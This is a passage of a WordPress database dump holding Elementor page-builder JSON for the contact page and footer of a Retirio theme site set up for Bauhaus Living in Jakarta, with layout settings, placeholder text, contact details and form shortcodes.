":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(2914,4727,'_elementor_page_assets','a:0:{}'),(2915,4727,'_elementor_pro_version','3.8.1'),(2916,4728,'_wp_page_template','elementor_header_footer'),(2917,4728,'_elementor_edit_mode','builder'),(2918,4728,'_elementor_template_type','wp-page'),(2919,4728,'_elementor_version','3.8.1'),(2920,4728,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(2921,4728,'_elementor_page_assets','a:0:{}'),(2922,4728,'_elementor_pro_version','3.8.1'),(2923,103,'_edit_lock','1695636221:3'),(2924,4729,'_wp_page_template','default'),(2925,4729,'_elementor_edit_mode','builder'),(2926,4729,'_elementor_template_type','wp-post'),(2927,4729,'_elementor_version','3.6.6'),(2928,4729,'_elementor_data','[{\"id\":\"ef331a9\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/lines.png\",\"id\":139,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"initial\",\"background_overlay_xpos\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"%\",\"size\":135,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":145,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-450,\"sizes\":[]},\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"auto\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.04,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_position_mobile\":\"initial\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"7d36326\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":58.992,\"content_position\":\"top\",\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"120\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bce0c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"We build amazing architectural designs\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e5254c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[mc4wp_form id=\\\"107\\\"]\",\"_css_classes\":\"mc4wp-style-1\"},\"elements\":[],\"widgetType\":\"shortcode\"},{\"id\":\"4631f27\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"layout\":\"full_width\",\"content_position\":\"middle\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"88bc706\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"626a216\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"auto\",\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"0caec2f\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 